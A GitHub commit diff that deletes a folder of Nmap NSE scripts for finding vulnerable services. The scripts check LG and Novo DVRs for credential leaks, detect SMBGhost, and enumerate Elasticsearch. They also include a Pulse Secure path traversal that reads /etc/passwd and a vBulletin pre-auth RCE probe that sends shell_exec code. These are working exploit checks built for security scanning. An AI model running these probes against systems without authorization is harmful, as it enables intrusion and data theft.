Delete nmap_scripts directory

InfoSec 2021-01-27 17:45:43 +08:00 committed by GitHub
parent 6fca5d3401
commit 5289648a6b
27 changed files with 0 additions and 4081 deletions


@ -1,29 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shortport"
description = [[
. LG DVR LE6016D
未认证远程获取用户/密码
]]
portrule = shortport.http
action = function(host, port)
local uri = "/dvr/wwwroot/user.cgi"
local output = stdnse.output_table()
local response = http.get(host, port, uri)
if response.status == 200 then
if string.find(response.body, "<name>") ~= nil and string.find(response.body, "<pw>") ~= nil then
output = "[+] Found vulnerable."
else
output = "[-] Not Found vulnerable."
end
end
return output
end


@ -1,34 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shorport"
description = [[
Desc:LG DVR LE6016D存在敏感信息泄露漏洞
未认证用户只需要发起一个请求链接即可访问系统敏感文件,
如/etc/passwd, /etc/shadow
Tested:LG DVR LE6016D
]]
author = "seaung"
portrule = shortport.http
action = function(host, port)
local output = stdnse.output_table()
local url = "/etc/passwd"
local response = http.get(host, port, url)
if response.status == 200 then
if string.find(response.body, "root") ~= nil then
output = "[+] Found vulnerable."
else
output = "[-] Not Found vulnerable."
end
end
return output
end


@ -1,34 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shortport"
description = [[
Desc:Novo DVR存在凭证泄露问题
攻击者精心构造链接,
修改cookie信息即可查看返回的登录凭证信息。
]]
author = "seaung"
portrule = shortport.http
action = function(host, port)
local url = "/device.rsp?opt=user&cmd=list"
local output = stdnse.output_table()
local options = {headers={}}
options["headers"]["cookie"] = "uid=admin"
local response = http.get(host, port, url, options)
if response.status == 200 then
if string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then
stdnse.debug1("[+] found vulnerable.")
output = "[+] Found vulnerable."
else
stdnse.debug1("[-] not found vulnerable.")
output = "[-] Not Found vulnerable."
end
end
return output
end


@ -1,115 +0,0 @@
local smb = require "smb"
local stdnse = require "stdnse"
local nmap = require "nmap"
description = [[
smb-protocols script modified to apply check for CVE-2020-0796 by psc4re.
Attempts to list the supported protocols and dialects of a SMB server.
NSE script to detect vulnerable CVE-2020-0796 issue, with Microsoft SMBv3 Compression (aka coronablue, SMBGhost)
The script is a modified version of smb-protocols.nse script
with a modified output data for v3.11 detection and validating CVE-2020-0796.
Note: This script just safe checks for CVE-2020-0796 vulnerability on SMBv3 and doesn't attempt anything beyond that.
Packet check based on https://github.com/ollypwn/SMBGhost/
The script attempts to initiate a connection using the dialects:
* NT LM 0.12 (SMBv1)
* 2.02 (SMBv2)
* 2.10 (SMBv2)
* 3.00 (SMBv3)
* 3.02 (SMBv3)
* 3.11 (SMBv3)
Additionally if SMBv1 is found enabled, it will mark it as insecure. This
script is the successor to the (removed) smbv2-enabled script.
#git clonehttps://github.com/pr4jwal/CVE-2020-0796
#cp cve-2020-0796.nse /usr/share/nmap/scripts/``
#nmap --script-updatedb
#nmap -p445 --script cve-2020-0796 <<target>>``
Checks for compression based on https://github.com/ollypwn/SMBGhost/
Could've been done utilizing smb.lua in the nselib
but it required substantial editing of the functions, went with sockets.
]]
---
-- @usage nmap -p445 --script smb-protocols <target>
-- @usage nmap -p139 --script smb-protocols <target>
--
-- @output
-- | smb-protocols:
-- | dialects:
-- | NT LM 0.12 (SMBv1) [dangerous, but default]
-- | 2.02
-- | 2.10
-- | 3.00
-- | 3.02
-- |_ 3.11 (SMBv3.11) compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost
--
-- @xmloutput
-- <table key="dialects">
-- <elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem>
-- <elem>2.02</elem>
-- <elem>2.10</elem>
-- <elem>3.00</elem>
-- <elem>3.02</elem>
-- <elem>3.11 (SMBv3.11) [Potentially Vulnerable to CVE-2020-0796 Coronablue]</elem>
-- </table>
---
author = "Paulino Calderon (Modified by Psc4re)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}
hostrule = function(host)
return smb.get_port(host) ~= nil
end
action = function(host,port)
local status, supported_dialects, overrides
local output = stdnse.output_table()
overrides = {}
status, supported_dialects = smb.list_dialects(host, overrides)
if status then
for i, v in pairs(supported_dialects) do -- Mark SMBv1 as insecure
if v == "NT LM 0.12" then
supported_dialects[i] = v .. " (SMBv1) [dangerous, but default]"
end
if v == "3.11" then
local msg
local response
local compresionalg
local comp
msg = '\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
local socket = nmap.new_socket()
socket:set_timeout(3000)
socket:connect(host.ip,445)
socket:send(msg)
response,data = socket:receive()
compressionalg= string.sub(data,-2)
if compressionalg == "\x01\x00" then
comp = "LZNT1 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x02\x00" then
comp ="LZ77 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x00\x00" then
comp ="No Compression Not Vulnerable"
elseif compressionalg == "\x03\x00" then
comp="LZ77+Huffman compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
end
supported_dialects[i] = v .." " .. comp
end
end
output.dialects = supported_dialects
end
if #output.dialects>0 then
return output
else
stdnse.debug1("No dialects were accepted")
if nmap.verbosity()>1 then
return "No dialects accepted. Something may be blocking the responses"
end
end
end


@ -1,34 +0,0 @@
description = [[
CVE api to fetch vuln in detected service
INSTALLATION
$ git clone https://github.com/arpitrohela/nmap_nse.git
$ cd nmap_nse/
$ sudo cp cve.nse /usr/share/nmap/scripts/
$ sudo nmap --script cve.nse 192.168.0.1 -p 80 -sV
]]
author = "Arpit Rohela"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln"}
local http = require "http"
-- The Rule Section --
portrule = function(host, port)
return port.state == "open"
end
-- The Action Section --
action = function(host, port)
local uri = "/api/search/httpd"
local response = http.get("cve.circl.lu", port, uri)
if ( response.status == 200 ) then
return response.body
-- and port.version.product--
-- and type(port.version.version)--
end
end


@ -1,67 +0,0 @@
description = [[
Attempts to enumerate indices, plugins and cluster nodes on a target elasticsearch
exposing an unauthenticated HTTP port (default 9200/tcp) using the elasticsearch RESTful API.
Installation
$ git clone https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git
$ cp nmap-elasticsearch-nse/elasticsearch.nse /usr/share/nmap/scripts/
$ nmap --script=elasticsearch <target>
]]
author = "theMiddle"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "version"}
local http = require "http"
local string = require "string"
local json = require "json"
portrule = function(host, port)
return port.protocol == "tcp" and port.state == "open"
end
action = function(host, port)
local uri = "/"
local response = http.get(host, port, uri)
if ( response.status == 200 ) then
if ( string.find(response.body, "You Know, for Search") ) then
local out = "by theMiddle (Twitter: @Menin_TheMiddle)\r\n\r\n"
out = out .. "found RESTful API\r\n"
err, esjson = json.parse(response.body)
out = out .. "version: ".. esjson['version']['number'] .."\r\n"
if esjson['cluster_name'] then
out = out .. "cluster name: " .. esjson['cluster_name'] .. "\r\n"
end
out = out .. "\r\nIndices found in /_cat/indices:\r\n"
local resindices = http.get_url("http://"..host.ip..":"..port.number.."/_cat/indices?pri&v&h=health,index,docs.count")
out = out .. resindices.body
out = out .. "\r\nPlugins found in /_cat/plugins:\r\n"
local resplugins = http.get_url("http://"..host.ip..":"..port.number.."/_cat/plugins")
out = out .. resplugins.body
out = out .. "\r\nNodes found in /_cat/nodes:\r\n"
local resnodes = http.get_url("http://"..host.ip..":"..port.number.."/_cat/nodes")
out = out .. resnodes.body
out = out .. "\r\nNodes process:\r\n"
local resprocess = http.get_url("http://"..host.ip..":"..port.number.."/_nodes/_all/process")
err, psjson = json.parse(resprocess.body)
for key,value in pairs(psjson['nodes']) do
out = out .. " - Name: " .. value['name'] .. "\r\n"
out = out .. " - Transport Address: " .. value['transport_address'] .. "\r\n"
out = out .. " - Host: " .. value['host'] .. "\r\n"
out = out .. " - IP: " .. value['ip'] .. "\r\n"
out = out .. " - Version: " .. value['version'] .. "\r\n\r\n"
end
return out
end
end
end


@ -1,379 +0,0 @@
-- Head
-- Required NSE libraries
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local http = require "http"
local json = require "json"
-- Input Arguments
local apipath = stdnse.get_script_args("freevulnsearch.apipath")
local notls = stdnse.get_script_args("freevulnsearch.notls")
local summary = stdnse.get_script_args("freevulnsearch.summary")
local xmlhtml = stdnse.get_script_args("freevulnsearch.xmlhtml")
description = [[
project https://github.com/OCSAF/freevulnsearch
This script [Version 1.1.8] allows you to automatically search for CVEs using the API of
https://www.circl.lu/services/cve-search/ in connection with the found CPEs
using the parameter -sV in NMAP.
This script is part of the FreeOCSAF Project - https://freecybersecurity.org.
Use only with legal authorization and at your own risk! ANY LIABILITY WILL BE REJECTED!
Thanks to cve-search.org and circl.lu for the ingenious api
and special thanks to the community for many useful ideas that speed up my coding!
Realized functions:
Version 1.0 - Contains the basic functions to quickly find relevant CVEs.
Version 1.0.1 - Includes EDB and MSF in output and minor changes.
Version 1.0.2 - Special CPE formatting and output optimization.
Version 1.0.3 - Small adjustments
Version 1.1 - Support your own cve-search api-link - https://<IP>/api/cvefor/
Version 1.1.1 - Adaptation to CVSS rating instead of OSSTMM - Input from the community, thanks
Version 1.1.2 - Special CPE formatting - Many thanks to Tore (cr33y) for testing.
Version 1.1.3b - Special CPE formatting - Many thanks to Tore (cr33y) for testing.
Version 1.1.4 - Optimization for OCSAF freevulnaudit.sh project.
Version 1.1.5 - Assignment to external category only
Version 1.1.6 - Adaptation API to http and tls as option
Version 1.1.6a - Adaptation API to tls and http as option
Version 1.1.7 - Optimized for nmap 7.80
Version 1.1.8 - Optimized for cve-search api
Future functions:
Version 1.2 - Shall contains optional sort by severity (CVSS)
Version 1.3 - Implementation of your useful ideas.
Usage:
nmap -sV --script freevulnsearch <target>
Output explanation:
CVE-Number Rating CVSS EDB MSF CVE-Link
CVE-Number:
Common Vulnerabilities and Exposures
CVSS v3.0 Ratings:
Critical (CVSS 9.0 - 10.0)
High (CVSS 7.0 - 8.9)
Medium (CVSS 4.0 - 6.9)
Low (CVSS 0.1 - 3.9)
None (CVSS 0.0)
CVSS:
Common Vulnerability Scoring System with with the level of severty from 0.0 - 10.0
EDB:
There is an exploit in the Exploit-DB.com
MSF:
There is a module in the Metasploit Framework
CVE-Link:
Additional information on the vulnerability found.
]]
author = "Mathias Gut"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "vuln", "external"}
-- @usage
-- nmap -sV --script freevulnsearch [--script-args apipath=<url>] <target>
-- nmap -sV --script freevulnsearch [--script-args notls=yes] <target>
-- nmap -sV --script freevulnsearch [--script-args summary=yes] <target>
-- nmap -sV --script freevulnsearch [--script-args xmlhmtl=yes] <target>
--
-- @output
--
-- 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
-- | freevulnsearch:
-- | CVE-2018-15473 Medium 5.0 EDB MSF https://cve.circl.lu/cve/CVE-2018-15473
-- | CVE-2017-15906 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-15906
-- | CVE-2016-10708 Medium 5.0 https://cve.circl.lu/cve/CVE-2016-10708
-- | CVE-2010-4755 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-4755
-- | CVE-2010-4478 High 7.5 https://cve.circl.lu/cve/CVE-2010-4478
-- | CVE-2008-5161 Low 2.6 https://cve.circl.lu/cve/CVE-2008-5161
-- |_ *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:4.7p1)
--
-- Portrule
-- The table port.version contains the CPEs
portrule = function(host, port)
local portv=port.version
return portv ~= nil and portv.version ~= nil
end
-- Function to check if a version number exists at the CPE
function func_check_cpe(cpe)
_, count = string.gsub(cpe, ":", " ")
if count >= 4 then
return cpe
else
return 0
end
end
-- Function to check for special CPE formatting.
function func_check_cpe_form(cpe)
local cpe_form
local sub_form1
local sub_form2
local sub_form3
local cpe_front
local cpe_version
_, count1 = string.gsub(cpe, ":httpfileserver:", " ")
_, count2 = string.gsub(cpe, ".*:.*:.*:.*:.*-", " ")
_, count3 = string.gsub(cpe, ".*:.*:.*:.*:.*_", " ")
_, count4 = string.gsub(cpe, ".*:.*:.*:.*:.*%..*%.%d%a%d", " ")
_, count5 = string.gsub(cpe, ".*:.*:.*:.*:.*%a%d", " ")
_, count6 = string.gsub(cpe, ".*:.*:.*:.*:.*%d%a", " ")
if count1 ~= 0 then
cpe_form = string.gsub(cpe,"httpfileserver","http_file_server")
return cpe_form
elseif count2 ~= 0 then -- (MySQL) 5.0.51a-3ubuntu5 -to- 5.0.51a
sub_form1 = string.gsub(cpe,".*:",":")
cpe_version = string.gsub(sub_form1,"-.*","")
cpe_front = string.gsub(cpe,cpe_version .. ".*","")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count3 ~= 0 then -- (Exim smtpd) 4.90_1 -to- 4.90
sub_form1 = string.gsub(cpe,".*:",":")
cpe_version = string.gsub(sub_form1,"_.*","")
cpe_front = string.gsub(cpe,cpe_version .. ".*","")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count4 ~= 0 then -- (OpenSSH) 6.6.1p1 -to- 6.6:p1
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%.%d%a%d.*","")
sub_form3 = string.gsub(sub_form1,".*%.%d","")
cpe_version = sub_form2 .. ":" .. sub_form3
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count5 ~= 0 then -- (OpenSSH) 7.5p1 -to- 7.5:p1
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%a.*","")
sub_form3 = string.gsub(sub_form1,sub_form2,"")
cpe_version = sub_form2 .. ":" .. sub_form3
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count6 ~= 0 then -- (ProFTPD) 1.3.5a -to- 1.3.5
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%d.*","")
cpe_version = string.gsub(sub_form1,sub_form2,"")
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
else
return 0
end
end
-- Function to check for known vulnerabilities without CVE
function func_check_known_vuln(cpe)
local cpe_vuln
if cpe == "cpe:/a:vsftpd:vsftpd:2.3.4" then
cpe_vuln = "EDB-ID-17491\t" .. "Critical\t" .. "None\t" .. "EDB MSF\t" .. "https://www.exploit-db.com/exploits/17491"
return cpe_vuln
else
return 0
end
end
-- Function to query CVEs via CPEs with API (circl.lu).
function func_check_cve(cpe)
local url
local option = {
max_body_size=40000000,
timeout=40000
}
local response
local request
local status
local vulnerabilities
if not apipath then
if not notls then
url = "https://cve.circl.lu/api/cvefor/"
else
url = "http://cve.circl.lu/api/cvefor/"
end
else
url = apipath
end
request = url .. cpe
response = http.get_url(request, option)
status, vulnerabilities = json.parse(response.body)
if status ~= true then
return 1
elseif type(next(vulnerabilities)) == "nil" then
return 2
elseif (status == true and vulnerabilities ~= "") then
return func_output(vulnerabilities)
else
return 2
end
end
-- Function to generate the script output.
function func_output(vulnerabilities)
local output_table = {}
local input_table = {}
local cve_url= "https://cve.circl.lu/cve/"
local cve_value
local cvss
local cvss_value
local cvss_rating
local url_value
local edb
local msf
local exploit
local sum
local cwe
local xmlhtml_out
local i
local t
if not xmlhtml then
xmlhtml_out = ""
else
xmlhtml_out = " "
end
for i,t in ipairs(vulnerabilities) do
cve_value = t.id
cvss = tonumber(t.cvss)
url_value = cve_url .. t.id
if t.refmap then
edb = t.refmap["exploit-db"]
msf = t.refmap.metasploit
end
if not cvss then
cvss_value = "None"
cvss_rating = "None"
else
cvss_value = cvss
cvss_rating = func_rating(cvss)
end
if not edb and not msf then
exploit = ""
elseif edb and not msf then
exploit = "EDB"
elseif not edb and msf then
exploit = "MSF"
elseif edb and msf then
exploit = "EDB MSF"
end
if not summary then
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value
else
sum = t.summary
if not t.cwe then
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value ..
"\n *SUMMARY: " .. sum .. "\n"
else
cwe = t.cwe
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value ..
"\n *CWE: " .. cwe ..
"\n *SUMMARY: " .. sum .. "\n"
end
end
input_table[i] = output_table
end
return input_table
end
-- Function to assign CVSS values to CVSS V3.0 ratings
function func_rating(cvss)
if (cvss == 0.0) then
return "None\t"
elseif (3.9 >= cvss and cvss >= 0.1) then
return "Low\t"
elseif (6.9 >= cvss and cvss >= 4.0) then
return "Medium\t"
elseif (8.9 >= cvss and cvss >= 7.0) then
return "High\t"
elseif (10.0 >= cvss and cvss >= 9.0) then
return "Critical"
end
end
-- Action
-- Main-Function
action = function(host, port)
local cpe=""
local check
local sort_values
local form_cpe
local known_vuln
local i
for i, cpe in ipairs(port.version.cpe) do
check = func_check_cpe(cpe)
if check ~= 0 then
sort_values = func_check_cve(check)
if sort_values == 1 then
return "*Error with API query. API or network possibly not available."
elseif sort_values == 2 then
form_cpe = func_check_cpe_form(check)
if form_cpe == 0 then
known_vuln = func_check_known_vuln(check)
if known_vuln == 0 then
return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" ..
"\n *Check other sources like https://www.exploit-db.com"
else
return "\n " .. known_vuln .. "\n *No CVE found with CPE: (" .. check .. ")"
end
else
sort_values = func_check_cve(form_cpe)
if sort_values == 2 then
return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" ..
"\n *No CVE found with freevulnsearch function: (" .. form_cpe .. ")" ..
"\n *Check other sources like https://www.exploit-db.com"
else
table.sort(sort_values, function(a, b) return a>b end)
table.insert(sort_values, "*No CVE found with NMAP-CPE: (" ..check .. ")")
table.insert(sort_values, "*CVE found with freevulnsearch function: (" .. form_cpe .. ")")
return sort_values
end
end
else
table.sort(sort_values, function(a, b) return a>b end)
table.insert(sort_values, "*CVE found with NMAP-CPE: (" ..check .. ")")
return sort_values
end
elseif check == 0 then
return "\n *Check unspecific version manually: (".. cpe .. ")"
end
end
end


@ -1,57 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"
description = [[
A middleware sensitive directory scan script
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script http-middleware-path-finder.nse victim_host
]]
author = "Rvn0xsy@gmail.com"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default"}
blog = "https://payloads.online"
-- Precision mode
-- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open")
portrule = shortport.service({"http","https"},"tcp","open")
action = function(host, port)
out = stdnse.output_table()
local status, result , body = http.identify_404(host,port)
local all = nil
request_paths = {
"/phpinfo.php",
"/manager/html",
"/_async/AsyncResponseService",
"/console/login/LoginForm.jsp",
"/phpmyadmin/",
"/web-console",
"/jmx-console",
"/host-manager",
"/status",
"/logs/access_log",
"/jonasAdmin/",
"/ibm/console/logon.jsp"
}
for key,value in ipairs(request_paths)
do
all = http.pipeline_add(value,nil,all,'GET')
end
local results = http.pipeline_go(host, port, all)
for num,res in ipairs(results)do
if(res.status ~= result)then
out[num] = request_paths[num]
end
end
return out
end


@ -1,82 +0,0 @@
description = [[
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4)
INSTALLATION
$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git
$ cd http-pulse_ssl_vpn.nse/
$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script pulse_ssl_vpn <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-cve2019-11510:
-- | VULNERABLE
-- | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-11510
-- |
-- | Disclosure date: 2019-04-24
-- | References:
-- | http://www.securityfocus.com/bid/108073
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
-- |_ http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
--
-- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "GET".
-- @args http-vuln-cve2019-11510.path The URL path to request. The default path is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests",
state = vulns.STATE.NOT_VULN,
description = [[
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
]],
IDS = {
CVE = "CVE-2019-11510"
},
references = {
'http://www.securityfocus.com/bid/108073',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510',
'http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html'
},
dates = {
disclosure = { year = '2019', month = '04', day = '24' }
}
}
-- Send a simple GET request to the server, if it returns appropiate string, then you have a vuln host
options = {header={}} options['header']['User-Agent'] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
--local req = http.get(host, port, uri, options)
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local url = stdnse.get_script_args(SCRIPT_NAME..".url") or "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
local response = http.generic_request(host, port, "GET", "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", options)
if response.status == 200 and string.match(response.body, "root:x:0:0:root:/:/bin/bash") then
-- if response.status == 200 then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end


@ -1,88 +0,0 @@
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
INSTALLATION
$ git clone https://github.com/r00tpgp/http-vuln-CVE-2019-16759
$ cd http-vuln-CVE-2019-16759/
$ sudo cp http-vuln-CVE-2019-16759.nse /usr/share/nmap/scripts/
$ sudo nmap --script http-vuln-CVE-2019-16759 -p 80 -sSV <target_ip_addr>
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-CVE-2019-16759:
-- | VULNERABLE
-- | vBulletin 5.x 0day pre-auth RCE exploit
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-16759
-- |
-- | Disclosure date: 2019-09-23
-- | References:
-- | https://seclists.org/fulldisclosure/2019/Sep/31
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "vBulletin 5.x 0day pre-auth RCE exploit",
state = vulns.STATE.NOT_VULN,
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]],
IDS = {
CVE = "CVE-2019-16759"
},
references = {
'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
},
dates = {
disclosure = { year = '2019', month = '09', day = '23' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"
local body = {
["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
}
local options = {
header = {
Connection = "close",
["Content-Type"] = "application/x-www-form-urlencoded",
["User-Agent"] = "curl/7.65.3",
["Accept"] = "*/*",
},
content = body
}
local response = http.post(host, port, path, nil, nil, body)
if response and string.match(response.body, "h4x0000r") then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end


@ -1,180 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
local table = require "table"
description = [[
Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others.
Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users. These directories have sensitive information within the configuration files.
Valid on Trane Tracer SC version 4.20.1134 and below. Tested on 7/3/17.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
References:
* https://ics-cert.us-cert.gov/advisories/ICSA-16-259-03
* http://www.cvedetails.com/cve/CVE-2016-0870/
* http://websec.mx
]]
---
-- @usage nmap -p80 --script http-vuln-cve2016-0870.nse <target>
--
-- @output
-- | trane-info:
-- | serverName: TracerSC
-- | serverTime: 2017-07-03T21:01:02-04:00
-- | serverBootTime: 2017-06-25T03:14:38-04:00
-- | vendorName: Trane
-- | productName: Tracer SC
-- | productVersion: v4.40.1211 (release)
-- | kernelVersion: 2.6.30_HwVer12AB-hydra
-- | hardwareType: HwVer12AB
-- | hardwareSerialNumber: E15A#####
-- | 1:equipmentUri: /equipment/generic/generic/##
-- | 1:displayName: BOILER ROOMS
-- | 1:deviceName: BOILER ROOMS
-- | 1:equipmentFamily: Generic
-- | 1:roleDocument: BOILER_ROOMS
-- | 1:isOffline: false
-- | 2:equipmentUri: /equipment/generic/generic/##
-- | 2:displayName: BOILER ROOMS
-- | 2:deviceName: BOILER ROOMS
-- | 2:equipmentFamily: Generic
-- | 2:roleDocument: BOILER_ROOMS
-- | 2:isOffline: false
-- | 3:equipmentUri: /equipment/generic/generic/##
-- | 3:displayName: EXHAUSTS 3 RM-6
-- | 3:deviceName: EXHAUSTS 3 RM-6
-- | 3:equipmentFamily: Generic
-- | 3:roleDocument: EXHAUSTS_3_RM-6
-- | 3:isOffline: false
--
-- @xmloutput
-- <elem key="serverName">TracerSC </elem>
-- <elem key="serverTime">2017-07-03T21:01:02-04:00 </elem>
-- <elem key="serverBootTime">2017-06-25T03:14:38-04:00 </elem>
-- <elem key="vendorName">Trane </elem>
-- <elem key="productName">Tracer SC </elem>
-- <elem key="productVersion">v4.40.1211 (release) </elem>
-- -- <elem key="kernelVersion">2.6.30_HwVer12AB-hydra </elem>
-- <elem key="hardwareType">HwVer12AB </elem>
-- <elem key="hardwareSerialNumber">E15A##### </elem>
-- <elem key="1:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="1:displayName">BOILER ROOMS </elem>
-- <elem key="1:deviceName">BOILER ROOMS </elem>
-- <elem key="1:equipmentFamily">Generic </elem>
-- <elem key="1:roleDocument">BOILER_ROOMS </elem>
-- <elem key="1:isOffline">false </elem>
-- <elem key="2:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="2:displayName">BOILER ROOMS </elem>
-- <elem key="2:deviceName">BOILER ROOMS </elem>
-- <elem key="2:equipmentFamily">Generic </elem>
-- <elem key="2:roleDocument">BOILER_ROOMS </elem>
-- <elem key="2:isOffline">false </elem>
-- <elem key="3:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="3:displayName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:deviceName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:equipmentFamily">Generic </elem>
-- <elem key="3:roleDocument">EXHAUSTS_3_RM-6 </elem>
-- <elem key="3:isOffline">false </elem>
---
